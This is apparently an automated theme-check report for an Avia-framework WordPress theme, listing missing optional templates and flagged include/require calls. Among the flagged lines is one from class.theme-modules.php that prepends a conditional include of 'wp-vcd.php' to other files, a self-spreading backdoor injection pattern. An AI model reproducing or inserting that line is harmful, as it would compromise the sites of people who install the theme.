  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  6. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  7. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  8. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  9. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  10. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  11. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  12. Use of includes : Use of include or requireThe theme appears to use include or require : config.php 60: include('admin-options.php');61: include('admin-import.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : avia_framework.php 39: require( 'php/inc-autoconfig.php' );52: require( AVIA_PHP.'class-superobject.php' );64: require( AVIA_PHP.'function-set-avia-backend.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-superobject.php 116: include(AVIA_BASE.'/includes/admin/register-admin-options.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-tgm-plugin-activation.php 1061: require_once( ABSPATH . 'wp-admin/includes/class-wp-list-table.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-htmlhelper.php 1559: if($link) @include($link); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-metabox.php 108: include( AVIA_BASE.'/includes/admin/register-admin-metabox.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : function-set-avia-backend.php 110: include_once( AVIA_PHP.$include.'.php' );146: include_once( $folder .'/'. $file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : function-set-avia-ajax.php 59: include( AVIA_BASE.'/includes/admin/register-admin-metabox.php' );81: @include($link);779: require_once($class_wp_import);788: require_once($class_avia_import); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : inc-autoconfig.php 139: require( AVIA_PHP.'function-set-avia-frontend.php' );144: require( AVIA_PHP.'class-megamenu.php' );149: require( AVIA_PHP.'avia_shortcodes/shortcodes.php' );154: require( AVIA_PHP.'class-style-generator.php' );159: require( AVIA_PHP.'class-form-generator.php' );164: require( AVIA_PHP.'class-framework-widgets.php' );169: require( AVIA_PHP.'class-breadcrumb.php' );175: require( AVIA_PHP.'class-queryfilter.php' );181: require( AVIA_PHP.'class-sidebar-generator.php' );192: require( AVIA_PHP.'function-set-avia-ajax.php' );197: require( AVIA_PHP.'class-adminpages.php' );202: require( AVIA_PHP.'class-metabox.php' );207: require( AVIA_PHP.'class-htmlhelper.php' );212: require( AVIA_PHP.'class-media.php' );217: require( AVIA_PHP.'class-database-option-sets.php' );222: require( AVIA_PHP.'wordpress-importer/avia-export-class.php' );227: require( AVIA_PHP.'auto-updates/auto-updates.php' );234: require( AVIA_PHP.'class-update-notifier.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-pixelentity-theme-update.php 32: require_once('class-envato-protected-api.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : auto-updates.php 45: require_once('class-pixelentity-theme-update.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : inc-avia-importer.php 23: require_once($class_wp_importer);37: require_once($class_wp_import);53: include_once('wordpress-importer/avia-import-class.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : dialog.php 5: require_once( $path[0] . '/wp-load.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : av-prev.php 5: require_once( $path[0] . '/wp-load.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : avia-import-class.php 13: if($option_file) @include_once($option_file); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 48: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : piecemaker.xml.php 17: if(@include( $path.'/wp-load.php')) If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes